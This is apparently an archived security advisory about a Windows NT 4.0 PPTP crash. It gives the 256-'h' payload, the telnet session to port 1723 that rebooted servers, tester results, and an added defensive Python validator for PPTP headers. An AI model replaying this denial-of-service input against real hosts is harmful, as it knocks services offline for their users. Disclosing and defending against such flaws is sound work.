COMMAND
PPTP (depending on what?)
SYSTEMS AFFECTED
WinNT
PROBLEM
Simon Helson posted the following. He was playing around with PPTP
last night and discovered that, with "very" minimal effort, one
could cause NT Server (version 4, Service Pack 4) to reboot
instantly, without shutting down. All he did was telnet to the
PPTP port (1723) on the NT box and send the following data:
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhh
(that's 256 'h's for those who don't want to count)
and hit return. Nothing. But when you hit ^D, all hell
broke loose: the NT server drops like a stone, full hardware
reboot. This was tested multiple times and always gave the same
result, but other testers reported mixed results.
Didn't work:
NT 4.0 SP4, RRAS - Chris Alliey
NT 4.0 Server SP3, 128-bit, no RAS - Russ
NT 4.0 Server SP3, PPTP3-fix, no RAS 128-bit - Russ
NT 4.0 Server SP4, 128-bit, no RAS - Russ
NT 4.0 Server SP4 - Lewman, Andrew
NT 4.0 Server Enterprise, SP4 - Lewman, Andrew
It worked:
NT 4.0 SP4, Option Pack - Huang Min
NT 4.0 Server, SP4, 40-bit, RAS - Simon Helson
NT 4.0, SP3, RAS, PPTP (Proliant PPro 200, Netelligent 10/100
ethernet, Compaq Fibre array) - Paul M. Hirsch
NT 4.0, SP3, 40-bit, PPTP, RAS (BSOD: STOP 0x0000000A in
RASPPTPE.sys) - Martin Rex
NT 4.0, SP4, RAS, PPTP (RAS & PPTP installed after SP4, The
problem disappeared when SP4 was reinstalled as per
Microsoft's instructions) - Ronny Cook
NT 4.0, SP3 (Machine freezes - dead mouse) - Emmanuel Tychon
Originally, the NT box had the following setup:
NT Server Version 4, with Service Pack 4.0 applied.
(outside US version - only 40 bit)
PPTP added as a network device
Number of VPNs available - 2
then the RAS service started.
The attack box setup:
RedHat Linux 5.2 running kernel 2.2.1
modem connection to the net
The procedure followed:
[root@blobby /root]# telnet <removed for privacy> 1723
Trying <removed for privacy>...
Connected to <removed for privacy>.
Escape character is '^]'
hhhhhhhhhhhhhhh<type 256 times>
^d (not shown in output)
^]
telnet> close
Connection closed.
The instant you hit ^D, his server rebooted.
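The telnet session above hands 256 'h' bytes to the PPTP control port, which is not a valid control message: per RFC 2637 every PPTP control message starts with a 12-byte header (length, message type, the fixed magic cookie 0x1A2B3C4D, control message type, reserved). The Python below is added here as an illustration; it is not part of Simon Helson's post and not Microsoft's PPTP code. It implements the header checks a conservative PPTP listener should apply before acting on received bytes, and runs them over a constructed copy of that telnet input and over a well-formed Start-Control-Connection-Request. The framing constants come from RFC 2637; the sample payloads, the hostname and vendor strings, and the assumption that telnet sends "\r\n" for the return key are constructed for the example. The advisory does not identify which code path in RASPPTPE.sys fails, so this is generic input validation, not a reconstruction of the bug.

```python
"""Minimal validator for PPTP (TCP/1723) control-message headers.

Added example: framing constants are from RFC 2637, sample inputs are
constructed here. Nothing below is from the advisory or from any
vendor implementation.
"""
import struct
from typing import List, Tuple

PPTP_TCP_PORT = 1723
PPTP_HEADER_LEN = 12            # Length(2) Type(2) Cookie(4) CtrlType(2) Reserved0(2)
PPTP_HEADER_FMT = "!HHIHH"      # all fields big-endian
PPTP_MAGIC_COOKIE = 0x1A2B3C4D  # fixed value carried by every control message
PPTP_MSG_CONTROL = 1
PPTP_MSG_MANAGEMENT = 2

# Control message types defined in RFC 2637 section 1.4.
PPTP_CTRL_TYPES = {
    1: "Start-Control-Connection-Request",
    2: "Start-Control-Connection-Reply",
    3: "Stop-Control-Connection-Request",
    4: "Stop-Control-Connection-Reply",
    5: "Echo-Request",
    6: "Echo-Reply",
    7: "Outgoing-Call-Request",
    8: "Outgoing-Call-Reply",
    9: "Incoming-Call-Request",
    10: "Incoming-Call-Reply",
    11: "Incoming-Call-Connected",
    12: "Call-Clear-Request",
    13: "Call-Disconnect-Notify",
    14: "WAN-Error-Notify",
    15: "Set-Link-Info",
}


def validate_control_message(data: bytes) -> Tuple[bool, str]:
    """Check one buffered control message; return (accepted, reason).

    Every check runs before any field is acted on, so bytes that do not
    form a well-formed header never reach the connection state machine.
    """
    if len(data) < PPTP_HEADER_LEN:
        return False, f"short read: {len(data)} bytes, header needs {PPTP_HEADER_LEN}"
    length, msg_type, cookie, ctrl_type, _reserved0 = struct.unpack(
        PPTP_HEADER_FMT, data[:PPTP_HEADER_LEN])
    if cookie != PPTP_MAGIC_COOKIE:
        return False, f"bad magic cookie 0x{cookie:08X}"
    if msg_type not in (PPTP_MSG_CONTROL, PPTP_MSG_MANAGEMENT):
        return False, f"unknown message type {msg_type}"
    if length < PPTP_HEADER_LEN or length > len(data):
        return False, f"length field {length} inconsistent with {len(data)} bytes received"
    if msg_type == PPTP_MSG_CONTROL and ctrl_type not in PPTP_CTRL_TYPES:
        return False, f"unknown control message type {ctrl_type}"
    name = PPTP_CTRL_TYPES.get(ctrl_type, "management message")
    return True, f"{name} ({length} bytes)"


def build_sccrq(hostname: bytes = b"example-pac", vendor: bytes = b"example") -> bytes:
    """Construct a well-formed Start-Control-Connection-Request (156 bytes).

    Field layout follows RFC 2637 section 2.2; the hostname and vendor
    strings are constructed sample values.
    """
    body = struct.pack("!HHIIHH",
                       0x0100,   # protocol version 1.0
                       0,        # reserved1
                       0x3,      # framing capabilities: async + sync
                       0x3,      # bearer capabilities: analog + digital
                       0,        # maximum channels (0 = not a PAC limit)
                       0)        # firmware revision
    body += hostname.ljust(64, b"\x00") + vendor.ljust(64, b"\x00")
    header = struct.pack(PPTP_HEADER_FMT, PPTP_HEADER_LEN + len(body),
                         PPTP_MSG_CONTROL, PPTP_MAGIC_COOKIE, 1, 0)
    return header + body


# Constructed sample: what the telnet session in the advisory delivers to
# the socket, assuming "\r\n" for the return key and 0x04 for ^D.
ADVISORY_GARBAGE = b"h" * 256 + b"\r\n" + b"\x04"


def triage(samples: List[Tuple[str, bytes]]) -> List[Tuple[str, bool, str]]:
    """Run the validator over labelled captured payloads."""
    return [(label, *validate_control_message(payload)) for label, payload in samples]


if __name__ == "__main__":
    captured = [
        ("telnet 256 x 'h'", ADVISORY_GARBAGE),
        ("valid SCCRQ", build_sccrq()),
        ("truncated SCCRQ", build_sccrq()[:40]),
    ]
    for label, ok, reason in triage(captured):
        print(f"{'ACCEPT' if ok else 'REJECT':6} {label}: {reason}")
```

The garbage input is rejected at the first check that inspects content (the bytes "hhhh" decode to cookie 0x68686868, not the PPTP magic cookie), and a message whose length field claims more bytes than were received is rejected before any body field is read, which is the kind of length-versus-buffer check that keeps a parser from reading past its input.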
SOLUTION
Hardware or device driver error, or maybe an issue with RAS but
not RRAS? It seems that there is indeed an issue here, but
reproducing it is difficult. Anyway, as always, the golden rule
is: apply the service pack after breathing on your NT server.
Once SP4 was re-applied, the vulnerability disappeared.